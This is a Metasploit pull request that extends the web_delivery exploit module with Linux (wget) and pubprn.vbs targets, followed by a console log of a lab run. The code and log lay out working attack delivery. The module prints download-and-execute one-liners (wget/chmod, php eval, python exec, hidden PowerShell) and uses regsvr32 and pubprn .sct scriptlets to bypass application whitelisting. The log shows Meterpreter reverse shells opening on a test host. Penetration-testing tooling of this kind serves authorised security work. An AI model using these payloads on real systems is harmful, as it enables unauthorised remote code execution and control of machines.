### PR TITLE
Add support for Linux and pubprn.vbs to multi/script/web_delivery

### DIFF
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -29,11 +29,17 @@ class MetasploitModule < Msf::Exploit::Remote
         or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.
 
         Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting.
-        The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included
-        PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute)
+        The signed Microsoft binary file, Regsvr32, is able to request an .sct file
+        and then execute the included PowerShell command inside of it.
+
+        Similarly, the pubprn target uses the pubprn.vbs script to request and
+        execute a .sct file.
+
+        Both web requests (i.e., the .sct file and PowerShell download/execute)
         can occur on the same port.
 
-        "PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.
+        "PSH (Binary)" will write a file to the disk, allowing for custom binaries
+        to be served up to be downloaded and executed.
       ),
       'License'      => MSF_LICENSE,
       'Author'       =>
@@ -44,6 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Casey Smith',    # AppLocker bypass research and vulnerability discovery (@subTee)
           'Trenton Ivey',   # AppLocker MSF Module (kn0)
           'g0tmi1k',        # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
+          'bcoles',         # support for pubprn and Linux wget
         ],
       'DefaultOptions' =>
         {
@@ -56,6 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
           ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
           ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
+          ['URL', 'https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'],
         ],
       'Platform'       => %w(python php win linux),
       'Targets'        =>
@@ -73,6 +81,10 @@ class MetasploitModule < Msf::Exploit::Remote
             'Arch' => [ARCH_X86, ARCH_X64]
           }],
           ['Regsvr32', {
+            'Platform' => 'win',
+            'Arch' => [ARCH_X86, ARCH_X64]
+          }],
+          ['pubprn', {
             'Platform' => 'win',
             'Arch' => [ARCH_X86, ARCH_X64]
           }],
@@ -103,8 +115,10 @@ class MetasploitModule < Msf::Exploit::Remote
     php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));")
     python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());")
     regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll)
+    pubprn = %Q(C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs 127.0.0.1 script:#{get_uri}.sct)
 
     print_status("Run the following command on the target machine:")
+
     case target.name
     when 'PHP'
       print_line("#{php}")
@@ -113,6 +127,8 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'PSH'
       psh = gen_psh("#{get_uri}", "string")
       print_line("#{psh}")
+    when 'pubprn'
+      print_line("#{pubprn}")
     when 'Regsvr32'
       print_line("#{regsvr}")
     when 'PSH (Binary)'
@@ -124,70 +140,80 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-
-  def on_request_uri(cli, _request)
-    if _request.raw_uri =~ /\.sct$/
+  def on_request_uri(cli, request)
+    if request.raw_uri.to_s.ends_with?('.sct')
+      print_status("Handling .sct Request")
       psh = gen_psh("#{get_uri}", "string")
-      data = gen_sct_file(psh)
-    elsif target.name.include? 'Linux'
+
+      case target.name
+      when 'pubprn'
+        data = gen_pubprn_sct_file(psh)
+      when 'Regsvr32'
+        data = gen_sct_file(psh)
+      else
+        print_error('Unexpected request for .sct file')
+      end
+
+      send_response(cli, data, 'Content-Type' => 'text/plain')
+      return
+    end
+
+    case target.name
+    when 'Linux'
       data = generate_payload_exe
-    elsif target.name.include? 'PSH (Binary)'
+    when 'PSH (Binary)'
       data = generate_payload_exe
-    elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32'
-      data = cmd_psh_payload(payload.encoded,
-                             payload_instance.arch.first,
-                             remove_comspec: true,
-                             exec_in_place: true
-                           )
+    when 'PSH', 'Regsvr32', 'pubprn'
+      data = cmd_psh_payload(
+        payload.encoded,
+        payload_instance.arch.first,
+        remove_comspec: true,
+        exec_in_place: true
+      )
     else
       data = %Q(#{payload.encoded})
     end
 
-    if _request.raw_uri =~ /\.sct$/
-      print_status("Handling .sct Request")
-      send_response(cli, data, 'Content-Type' => 'text/plain')
-    else
-      print_status("Delivering Payload")
-      send_response(cli, data, 'Content-Type' => 'application/octet-stream')
-    end
+    print_status("Delivering Payload (#{data.length}) bytes")
+    send_response(cli, data, 'Content-Type' => 'application/octet-stream')
   end
-
 
   def gen_psh(url, *method)
-      ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
+    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
 
-      if method.include? 'string'
-        download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
-      else
-        # Random filename to use, if there isn't anything set
-        random = "#{rand_text_alphanumeric 8}.exe"
+    if method.include? 'string'
+      download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
+    else
+      # Random filename to use, if there isn't anything set
+      random = "#{rand_text_alphanumeric 8}.exe"
 
-        # Set filename (Use random filename if empty)
-        filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']
+      # Set filename (Use random filename if empty)
+      filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']
 
-        # Set path (Use %TEMP% if empty)
-        path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')
+      # Set path (Use %TEMP% if empty)
+      path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')
 
-        # Join Path and Filename
-        file = %Q(echo (#{path}+'\\#{filename}'))
+      # Join Path and Filename
+      file = %Q(echo (#{path}+'\\#{filename}'))
 
-        # Generate download PowerShell command
-        download_string = Rex::Powershell::PshMethods.download_run(url, file)
-      end
+      # Generate download PowerShell command
+      download_string = Rex::Powershell::PshMethods.download_run(url, file)
+    end
 
-      download_and_run = "#{ignore_cert}#{download_string}"
+    download_and_run = "#{ignore_cert}#{download_string}"
 
-      # Generate main PowerShell command
-      return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
+    # Generate main PowerShell command
+    return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
   end
-
 
   def rand_class_id
     "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}"
   end
 
-
   def gen_sct_file(command)
     %{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}
+  end
+  def gen_pubprn_sct_file(command)
+    %{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric 8}" classid="{#{rand_class_id}}" remotable="true"></registration><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></scriptlet>}
   end
 end

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
           ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
         ],
-      'Platform'       => %w(python php win),
+      'Platform'       => %w(python php win linux),
       'Targets'        =>
         [
           ['Python', {
@@ -79,6 +79,10 @@ class MetasploitModule < Msf::Exploit::Remote
           ['PSH (Binary)', {
             'Platform' => 'win',
             'Arch' => [ARCH_X86, ARCH_X64]
+          }],
+          ['Linux', {
+            'Platform' => 'linux',
+            'Arch' => [ARCH_X86, ARCH_X64]
           }]
         ],
       'DefaultTarget'  => 0,
@@ -90,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
       OptBool.new('PSH-Proxy',            [ true,  'PSH - Use the system proxy', true ]),
       OptString.new('PSHBinary-PATH',     [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]),
       OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]),
-    ], self.class
+    ]
   )
   end
 
@@ -114,6 +118,9 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'PSH (Binary)'
       psh = gen_psh("#{get_uri}", "download")
       print_line("#{psh}")
+    when 'Linux'
+      fname = Rex::Text.rand_text_alphanumeric 8
+      print_line "wget -qO #{fname} --no-check-certificate #{get_uri}; chmod +x #{fname}; ./#{fname}&"
     end
   end
 
@@ -122,6 +129,8 @@ class MetasploitModule < Msf::Exploit::Remote
     if _request.raw_uri =~ /\.sct$/
       psh = gen_psh("#{get_uri}", "string")
       data = gen_sct_file(psh)
+    elsif target.name.include? 'Linux'
+      data = generate_payload_exe
     elsif target.name.include? 'PSH (Binary)'
       data = generate_payload_exe
     elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32'


### PR DESCRIPTION
Someone was recently asking on Slack about getting a session via a web shell.

The `web_delivery` module mostly achieved their goals, however the module is largely focused on Windows / Powershell, with support for `php` and `python` platforms.

This PR adds support for Linux too, because why not.

Here's the log:

```
root@kali:/pentest/exploit/metasploit-framework# ./msfconsole 
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  

                            _ood>H&H&Z?#M#b-\.
                        .\HMMMMMR?`\M6b."`' ''``v.
                     .. .MMMMMMMMMMHMMM#&.      ``~o.
                   .   ,HMMMMMMMMMM`' '           ?MP?.
                  . |MMMMMMMMMMM'                 `"$b&\
                 -  |MMMMHH##M'                     HMMH?
                -   TTM|     >..                   \HMMMMH
               :     |MM\,#-""$~b\.                `MMMMMM+
              .       ``"H&#        -               &MMMMMM|
              :            *\v,#MHddc.              `9MMMMMb
              .               MMMMMMMM##\             `"":HM
              -          .  .HMMMMMMMMMMRo_.              |M
              :             |MMMMMMMMMMMMMMMM#\           :M
              -              `HMMMMMMMMMMMMMM'            |T
              :               `*HMMMMMMMMMMM'             H'
               :                MMMMMMMMMMM|             |T
                ;               MMMMMMMM?'              ./
                 `              MMMMMMH'               ./'
                  -            |MMMH#'                 .
                   `           `MM*                . `
                     _          #M: .    .       .-'
                        .          .,         .-'
                           '-.-~ooHH__,,v~--`'

    __  __           __      __  __            ____  __                 __ 
   / / / /___ ______/ /__   / /_/ /_  ___     / __ \/ /___ _____  ___  / /_
  / /_/ / __ `/ ___/ //_/  / __/ __ \/ _ \   / /_/ / / __ `/ __ \/ _ \/ __/
 / __  / /_/ / /__/ ,<    / /_/ / / /  __/  / ____/ / /_/ / / / /  __/ /_  
/_/ /_/\__,_/\___/_/|_|   \__/_/ /_/\___/  /_/   /_/\__,_/_/ /_/\___/\__/  


       =[ metasploit v5.0.0-dev-b5c4ac6                   ]
+ -- --=[ 1865 exploits - 1050 auxiliary - 321 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

msf5 > use exploit/multi/script/web_delivery 
msf5 exploit(multi/script/web_delivery) > info

       Name: Script Web Delivery
     Module: exploit/multi/script/web_delivery
   Platform: Python, PHP, Windows, Linux
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Manual
  Disclosed: 2013-07-19

Provided by:
  Andrew Smith "jakx" <jakx.ppr@gmail.com>
  Ben Campbell <eat_meatballs@hotmail.co.uk>
  Chris Campbell
  Casey Smith
  Trenton Ivey
  g0tmi1k

Available targets:
  Id  Name
  --  ----
  0   Python
  1   PHP
  2   PSH
  3   Regsvr32
  4   PSH (Binary)
  5   Linux

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)

Payload information:

Description:
  This module quickly fires up a web server that serves a payload. The 
  provided command which will allow for a payload to download and 
  execute. It will do it either specified scripting language 
  interpreter or "squiblydoo" via regsvr32.exe for bypassing 
  application whitelisting. The main purpose of this module is to 
  quickly establish a session on a target machine when the attacker 
  has to manually type in the command: e.g. Command Injection, RDP 
  Session, Local Access or maybe Remote Command Execution. This attack 
  vector does not write to disk so it is less likely to trigger AV 
  solutions and will allow privilege escalations supplied by 
  Meterpreter. When using either of the PSH targets, ensure the 
  payload architecture matches the target computer or use SYSWOW64 
  powershell.exe to execute x86 payloads on x64 machines. Regsvr32 
  uses "squiblydoo" technique for bypassing application whitelisting. 
  The signed Microsoft binary file, Regsvr32, is able to request an 
  .sct file and then execute the included PowerShell command inside of 
  it. Both web requests (i.e., the .sct file and PowerShell 
  download/execute) can occur on the same port. "PSH (Binary)" will 
  write a file to the disk, allowing for custom binaries to be served 
  up to be downloaded/executed.

References:
  CVE: Not available
  https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html
  https://www.pentestgeek.com/2013/07/19/invoke-shellcode/
  http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/
  https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
  https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html

msf5 exploit(multi/script/web_delivery) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   PSH (Binary)
   5   Linux


msf5 exploit(multi/script/web_delivery) > set target 5
target => 5
msf5 exploit(multi/script/web_delivery) > set payload
payload => python/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > run -jz

[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/script/web_delivery) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(multi/script/web_delivery) > run

[-] Exploit failed: python/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.191.188   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   5   Linux


msf5 exploit(multi/script/web_delivery) > set lport 1337
lport => 1337
msf5 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.191.188:1337 
[*] Using URL: http://0.0.0.0:8080/Sdl0fmnhNU6Mtq
[*] Local IP: http://172.16.191.188:8080/Sdl0fmnhNU6Mtq
[*] Server started.
[*] Run the following command on the target machine:
wget -qO PeqnlhHN --no-check-certificate http://172.16.191.188:8080/Sdl0fmnhNU6Mtq; chmod +x PeqnlhHN; ./PeqnlhHN
msf5 exploit(multi/script/web_delivery) > jobs

Jobs
====

  Id  Name                                Payload                            Payload opts
  --  ----                                -------                            ------------
  0   Exploit: multi/script/web_delivery  linux/x64/meterpreter/reverse_tcp  tcp://172.16.191.188:1337

msf5 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

No active sessions.

msf5 exploit(multi/script/web_delivery) > 
[*] 172.16.191.141   web_delivery - Delivering Payload
[*] Sending stage (861348 bytes) to 172.16.191.141
[*] Meterpreter session 1 opened (172.16.191.188:1337 -> 172.16.191.141:52414) at 2019-01-06 14:24:10 -0500

msf5 exploit(multi/script/web_delivery) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                                                           Connection
  --  ----  ----                   -----------                                                           ----------
  1         meterpreter x64/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ centos-7-1708.localdomain  172.16.191.188:1337 -> 172.16.191.141:52414 (172.16.191.141)

msf5 exploit(multi/script/web_delivery) > # i'm an idiot. i totally should have backgrounded the process...
[-] Parse error: Unmatched double quote: "# i'm an idiot. i totally should have backgrounded the process..."
msf5 exploit(multi/script/web_delivery) > reload
[*] Reloading module...
msf5 exploit(multi/script/web_delivery) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf5 exploit(multi/script/web_delivery) > sessions -K
[*] Killing all sessions...
[*] 172.16.191.141 - Meterpreter session 1 closed.
msf5 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.191.188:1337 
[*] Using URL: http://0.0.0.0:8080/UDYB8BJhNVu
[*] Local IP: http://172.16.191.188:8080/UDYB8BJhNVu
[*] Server started.
[*] Run the following command on the target machine:
wget -qO YzTkTwOH --no-check-certificate http://172.16.191.188:8080/UDYB8BJhNVu; chmod +x YzTkTwOH; ./YzTkTwOH&
msf5 exploit(multi/script/web_delivery) > [*] 172.16.191.141   web_delivery - Delivering Payload
[*] Sending stage (861348 bytes) to 172.16.191.141
[*] Meterpreter session 2 opened (172.16.191.188:1337 -> 172.16.191.141:52418) at 2019-01-06 14:25:04 -0500

msf5 exploit(multi/script/web_delivery) > # much better
^CInterrupt: use the 'exit' command to quit
msf5 exploit(multi/script/web_delivery) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                                                           Connection
  --  ----  ----                   -----------                                                           ----------
  2         meterpreter x64/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ centos-7-1708.localdomain  172.16.191.188:1337 -> 172.16.191.141:52418 (172.16.191.141)

msf5 exploit(multi/script/web_delivery) > sessions -i 1
[-] Invalid session identifier: 1
msf5 exploit(multi/script/web_delivery) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : centos-7-1708.localdomain
OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.191.141 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(multi/script/web_delivery) > 
```